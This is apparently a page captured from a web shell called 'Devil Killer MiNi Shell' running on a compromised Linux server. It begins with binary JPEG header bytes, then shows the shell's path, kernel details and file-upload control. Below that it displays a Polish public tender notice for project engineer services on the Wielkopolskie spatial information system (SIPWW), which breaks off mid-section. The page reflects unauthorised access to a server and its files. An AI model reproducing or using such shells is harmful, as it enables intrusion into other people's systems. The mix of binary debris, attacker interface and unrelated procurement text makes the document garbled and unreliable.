JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250422/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250422/0020073701-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług Inżyniera Projektu w projekcie pn.<br/>„Rozbudowa Systemu Informacji Przestrzennej <br/>Województwa Wielkopolskiego (SIPWW)” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Województwo Wielkopolskie z siedzibą Urzędu Marszałkowskiego Województwa Wielkopolskiego w Poznaniu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 631257816</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">al. Niepodległości 34</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Poznań</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">61-714</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL415 - Miasto Poznań</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@umww.pl ; kancelaria@umww.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.umww.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług Inżyniera Projektu w projekcie pn.<br/>„Rozbudowa Systemu Informacji Przestrzennej <br/>Województwa Wielkopolskiego (SIPWW)” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-fbe9d7af-0a44-46c1-ba8f-feac516c715f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00200737</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-04-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00041421/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.21 Świadczenie usług Inżyniera Projektu w ramach Rozbudowy Systemu Informacji Przestrzennej Województwa Wielkopolskiego (SIPWW)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Planowany do dofinansowania przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach programu Fundusze Europejskie dla Wielkopolski 2021 – 2027 (FEW 2021+), priorytet FEWP.01 Fundusze europejskie dla wielkopolskiej gospodarki, działanie 1.3 Rozwój e-usług i e-zasobów publicznych. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://e-zp.umww.pl/procurements/236/procurement <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://e-zp.umww.pl/procurements/236/procurement</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W niniejszym postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa się za pośrednictwem platformy E-Zamówienia Publiczne Województwo Wielkopolskie z siedzibą UMWW w Poznaniu, (zwanego dalej platformą e-ZP) dostępnej pod adresem: https://e-zp.umww.pl. Wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje przekazywane są przy użyciu platformy e-ZP.<br/>Ponadto wszelkie informacje dotyczące postępowania, w tym: zapytania i odpowiedzi dla Wykonawców, modyfikacje treści SWZ, informacje o wynikach postępowania, itp. będą zamieszczane na platformie e-ZP.<br/><br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na platformie e-ZP. Rejestracja i korzystanie z platformy e-ZP jest bezpłatne. Zaleca się rejestrację konta na platformie e-ZP na adres email wskazany w formularzu ofertowym.<br/>Użytkownik niezarejestrowany może jedynie przeglądać treści udostępniane w części publicznej platformy e-ZP. Jest to równoznaczne z tym, że użytkownicy niezarejestrowani nie mają dostępu do wszystkich funkcji platformy. Dokonując rejestracji Wykonawca akceptuje Regulamin korzystania z platformy e-ZP.<br/>Na platformie e-ZP znajdują się także: instrukcja dla Wykonawcy (Instrukcja obsługi Systemu FINN E-Zamówienia Publiczne) oraz filmy instruktażowe, prezentujące podstawowe czynności dokonywane przez Wykonawców za pomocą platformy (rejestracja, zadawanie pytań, złożenie oferty, wycofanie oferty). Instrukcja dostępna jest pod adresem: https://pomoc.e-zp.finn.pl.<br/>Specyfikacja połączenia, formatu przesyłanych danych oraz kodowania i oznaczania czasu odbioru danych na platformie e-ZP:<br/>a)	Format kodowania treści w obrębie platformy e-ZP – UTF8,<br/>b)	Komunikacja pomiędzy przeglądarką Wykonawcy, a serwerem jest wykonywana przy użyciu bezpiecznego protokołu HTTPS,<br/>c)	Oznaczeniem czasu odbioru danych przez platformę e-ZP jest data oraz dokładny czas (hh:mm:ss) - czas lokalny serwera synchronizowany odpowiednim źródłem czasu.<br/><br/><br/>Wymagania techniczne związane z korzystaniem z platformy e-ZP, tj. informacje dotyczące specyfikacji połączenia, formatu przesyłanych danych oraz kodowania i oznaczania czasu przekazania danych:<br/>a)	stały dostęp do sieci Internet i minimalna prędkość połączenia internetowego nie mniejsza niż 512 kb/s,<br/>b)	zaktualizowana przeglądarka internetowa Chrome w wersji 77 i późniejsze lub Mozilla Firefox w wersji 63 i późniejsze,<br/>c)	system operacyjny Microsoft Windows 7 i późniejsze lub Apple mac iOS 10.14 i późniejsze, dystrybucje systemu Linux.<br/><br/>Złożenie oferty w trybie podstawowym poprzez platformę e-ZP wymaga posiadania przez Wykonawcę kwalifikowanego podpisu elektronicznego lub podpisu osobistego lub podpisu zaufanego.<br/><br/>Pliki można podpisać przed dołączeniem do platformy e-ZP za pomocą zewnętrznych narzędzi do podpisu lub po dołączeniu do platformy e-ZP przy pomocy kwalifikowanego podpisu elektronicznego lub podpisu osobistego lub podpisu zaufanego.<br/><br/>Korzystanie z dostępnej na platformie e-ZP funkcji składania podpisu elektronicznego (kwalifikowany podpis elektroniczny, podpis osobisty, podpis zaufany) możliwe jest pod warunkiem, że system teleinformatyczny, z którego korzysta Wykonawca, wyposażony jest w jeden z poniższych komponentów:<br/>‒	wirtualną maszynę Java firmy Oracle w wersji co najmniej 1.8.0_221 (Java SE JRE 8 Update 221) z obsługą technologii Java Web Start (JavaWS) lub<br/>‒	wirtualną maszynę OpenJDK w wersji co najmniej 1.8.0_222 z zainstalowanym rozszerzeniem IcedTea Web Start.<br/><br/>Powyższe wymagania nie ograniczają możliwości korzystania przez Wykonawcę z zewnętrznego oprogramowania do składania podpisu elektronicznego:<br/>a)	kwalifikowany podpis elektroniczny (dopuszczalne formaty podpisów: PaDES – format.pdf, XaDES – pozostałe formaty),<br/>b)	podpis osobisty,<br/>c)	podpis zaufany.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BGW-III-S.272.1.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest świadczenie usług Inżyniera Projektu w projekcie pn. „Rozbudowa Systemu Informacji Przestrzennej Województwa Wielkopolskiego (SIPWW)”.<br/>Zamówienie nie zostało podzielone na części, z uwagi na fakt, iż przedmiotem zamówienia jest kompleksowa usługa doradcza oraz wsparcia przy realizacji projektu pn. ,,Rozbudowa Systemu Informacji Przestrzennej Województwa Wielkopolskiego (SIPWW)”. Projekt ten składa się z wielu zależnych od siebie zadań, w tym w szczególności powiązanych technicznie, co powoduje konieczność pełnienia usług doradczych przez jeden podmiot posiadający znajomość całości Projektu. Zamówienie nie może zostać podzielone na części ze względu na możliwość pojawienia się nadmiernych trudności technicznych i nadmiernych kosztów wykonania zamówienia. Podział zamówienia na części wymagałby również podjęcia dodatkowych czynności mających na celu skoordynowanie działań różnych wykonawców realizujących poszczególne części zamówienia, co w przypadku pojawienia się problemów z realizacją któregoś z nich, mogłoby negatywnie wpłynąć na końcowy efekt realizacji projektu pn. ,,Rozbudowa Systemu Informacji Przestrzennej Województwa Wielkopolskiego (SIPWW)”. Wskazane powyżej uzasadnienie nawiązuje do punktu 78 preambuły Parlamentu Europejskiego i Rady 2014/24/UE z dnia 26 lutego 2014 r. w sprawie zamówień publicznych, uchylającej dyrektywę 2004/18/WE, w którym wymieniono możliwe powody niezastosowania podziału na części: „w przypadku, gdy instytucja zamawiająca zdecyduje, że podział zamówienia na części nie byłby właściwy, dokumenty zamówienia powinny zawierać wskazanie głównych przyczyn decyzji instytucji zamawiającej. Przyczyny te mogłyby być na przykład następujące: instytucja zamawiająca mogłaby stwierdzić, że taki podział groziłby ograniczeniem konkurencji albo nadmiernymi trudnościami technicznymi lub nadmiernymi kosztami wykonania zamówienia, lub też potrzeba skoordynowania działań różnych wykonawców realizujących poszczególne części zamówienia mogłaby zagrozić właściwemu wykonaniu zamówienia”.<br/>Przedmiot zamówienia obejmuje:<br/>a)	opracowanie harmonogramu realizacji Projektu oraz dokumentacji aplikacyjnej, w tym wniosku o dofinansowanie i studium wykonalności projektu,<br/>b)	koordynację działań w ramach Projektu, monitorowanie harmonogramu, budżetu oraz ryzyk w projekcie,<br/>c)	doradztwo w zakresie prowadzenia i rozliczania Projektu,<br/>d)	opracowywanie dokumentacji do zamówień publicznych, udział w szacowaniu wartości zamówień oraz doradztwo na etapie postępowań przetargowych,<br/>e)	nadzór nad pracami wykonawców, ocena jakości produktów i usług,<br/>f)	udział w testach Systemu,<br/>g)	określanie kryteriów odbioru i udział w odbiorach.<br/>Szczegółowo przedmiot i zakres zamówienia został określony w załączniku nr 1. do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72224000-1 - Usługi doradcze w zakresie zarządzania projektem</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2029-12-14</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe doświadczenie członków zespołu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Sytuacja ekonomiczna lub finansowa – Zamawiający wymaga na potwierdzenie spełnienia tego warunku, aby Wykonawca posiadał ubezpieczenie od odpowiedzialności cywilnej przez cały okres realizacji zamówienia w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie niższą niż 1 000 000,00 zł (słownie: jeden milion złotych 00/100).<br/><br/>Zdolność techniczna lub zawodowa – Zamawiający uzna warunek udziału za spełniony, jeśli Wykonawca wykaże, że:<br/><br/>a)	w okresie ostatnich pięciu lat przed terminem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie, a w przypadku świadczeń okresowych lub ciągłych, wykonuje należycie, co najmniej:<br/>I.	dwie usługi inżyniera projektu obejmujące co najmniej (każda z usług) opracowanie dokumentacji aplikacyjnej, opracowanie dokumentacji do zamówień publicznych, doradztwo na etapie postępowań przetargowych, nadzorowanie czynności wykonywanych przez wykonawców, udział w odbiorach końcowych i doradztwo przy rozliczeniach projektu w projektach obejmujących (każdy z projektów) budowę lub rozbudowę oraz wdrożenie systemów informacji przestrzennej (GIS), z czego przynajmniej jeden projekt obejmował wdrożenie elektronicznych usług publicznych na co najmniej 4. poziomie dojrzałości (4 poziom dojrzałości – pełna transakcyjność - usługi w całości zrealizowane w formie elektronicznej, wraz z ewentualną płatnością),<br/>II.	dwie usługi inżyniera projektu obejmujące co najmniej (każda z usług) opracowanie dokumentacji do zamówień publicznych, doradztwo na etapie postępowań przetargowych, nadzorowanie czynności wykonywanych przez wykonawców i udział w odbiorach końcowych w projektach informatycznych, obejmujących budowę lub rozbudowę oraz wdrożenie oprogramowania dedykowanego zawierającego moduł informacji przestrzennej i geoportal, o budżecie projektu większym niż 5 milionów złotych brutto każdy,<br/>III.	dwie usługi doradcze o wartości powyżej 300 tysięcy złotych brutto każda;<br/>UWAGA 1. Wykonawca może wykazać te same usługi na spełnienie warunków I – III.<br/>UWAGA 2. Zamawiający wymaga, żeby w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia wszystkie warunki I – III były spełnione przez co najmniej jednego z wykonawców.<br/>UWAGA 3. W przypadku świadczeń okresowych lub ciągłych Zamawiający wymaga, żeby wykonywane świadczenia, spełniły cały zakres warunków udziału, to jest odnośnie wszystkich wymaganych czynności i wartości budżetu projektu i usług, określonych w pkt I – III już na etapie złożenia oferty. W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/><br/>b)	na potrzeby realizacji zamówienia dysponuje lub będzie dysponował zespołem co najmniej 10 osób, pełniących następujące role i spełniających warunki: Uwaga podano tylko funckcje/nazwy, a szczegółowe warunki podano w SWZ z uwagi na ograniczenie ilości znaków w formularzu Ogłoszenia o zamówieniu<br/>I.	Kierownik zespołu Inżyniera Projektu <br/>II.	Zastępca kierownika zespołu Inżyniera Projektu <br/>III.	Specjalista ds. GIS <br/>IV.	Specjalista ds. transportu publicznego <br/>V.	Specjalista ds. klasyfikacji gruntów <br/>VI.	Specjalista ds. architektury systemów IT <br/>VII.	Specjalista ds. cyberbezpieczeństwa <br/>VIII.	Specjalista ds. ochrony danych osobowych <br/>IX.	Specjalista ds. rozliczeń projektów <br/>X.	Specjalista ds. zamówień publicznych <br/>UWAGA: Zamawiający dopuszcza łączenie powyższych ról. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający dopuszcza zmianę postanowień Umowy w następujących przypadkach: <br/>a)	gdy niedotrzymanie pierwotnego terminu realizacji Umowy stanowi konsekwencję działania siły wyższej niezależnej od Wykonawcy, nie stanowiącej jego i podwykonawców problemów organizacyjnych, których nie można było przewidzieć, poza zdarzeniami zwykłymi – Zamawiający dopuszcza możliwość przedłużenia terminu realizacji Umowy o czas niezbędny do usunięcia konsekwencji działania siły wyższej. Przez siłę wyższą należy rozumieć zdarzenie niezależne od Wykonawcy, nie stanowiące jego problemów organizacyjnych, którego Strony Umowy nie mogły przewidzieć, któremu nie mogły zapobiec, ani któremu nie mogły przeciwdziałać, a które uniemożliwia Wykonawcy wykonanie w części lub w całości jego zobowiązania wynikającego z Umowy, <br/>b)	gdy dokonanie zmiany Umowy jest korzystne dla Zamawiającego, a w szczególności: <br/>‒	może obniżyć koszt realizacji Przedmiotu Umowy, <br/>‒	może przyczynić się do podniesienia jakości wykonania Przedmiotu Umowy, <br/>‒	może przyczynić się do usprawnienia i podniesienia efektywności wykonania Przedmiotu Umowy, <br/>c)	w razie, gdy podczas wykonania Przedmiotu Umowy zaistnieje konieczność dokonania aktualizacji, uszczegółowienia, wykładni lub doprecyzowania poszczególnych postanowień Umowy, niepowodujących zmiany celu i istoty Umowy; <br/>d)	w razie wystąpienia konieczności wprowadzenia aneksu do Umowy o charakterze informacyjnym i instrukcyjnym, niezbędnej do realizacji Umowy, jeśli zmiany te nie mają charakteru istotnego, <br/>e)	gdy obiektywnie jest to niezbędne dla zachowania i realizacji celów Umowy, dla których została ona zawarta, <br/>f)	gdy zmiany wynikają ze zmiany obowiązujących przepisów, jeżeli konieczne będzie dostosowanie postanowień Umowy do nowego stanu prawnego. Zmiany w tym zakresie ograniczone będą wyłącznie do dostosowania Umowy do zmienionych regulacji prawnych, <br/>g)	w zakresie wynagrodzenia Wykonawcy, gdy w okresie trwania Umowy zmianie ulegną: <br/>‒	stawki podatku od towarów i usług (VAT) – w takim przypadku wynagrodzenie umowne zostanie zmienione odpowiednio do zmian stawek podatku od towarów i usług (VAT), <br/>‒	wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 roku o minimalnym wynagrodzeniu za pracę (Dz. U. 2024 poz. 1773 ze zm.) - o ile zmiany te będą miały wpływ na koszty wykonywania Przedmiotu Umowy przez Wykonawcę, <br/>‒	zasady podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub w wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne - o ile zmiany te będą miały wpływ na koszty wykonywania Przedmiotu Umowy przez Wykonawcę, <br/>‒	zasady gromadzenia i wysokości wpłat pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 roku o pracowniczych planach kapitałowych (Dz. U. 2024 poz. 427) – o ile zmiany te będą miały wpływ na koszty wykonywania Przedmiotu Umowy przez Wykonawcę. <br/>2.	Zamawiający dopuszcza możliwość zmian postanowień Umowy w innych, niż określone w ust. 1 sytuacjach, których nie można było przewidzieć w chwili zawarcia Umowy i mających charakter zmian nieistotnych, tj. nieodnoszących się do kwestii, które podlegały ocenie podczas wyboru Wykonawcy, a także takich, których wprowadzenie na etapie postępowania nie miałoby wpływu na zmianę kręgu podmiotów, które ubiegają się o to zamówienie lub doprowadziłoby do wyboru innej oferty niż pierwotnie. <br/><br/>§ 15 Waloryzacja - z uwagi na ograniczenia ilości znaków, podano w uwagach dodatkowych na końcu Ogłoszenia <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, 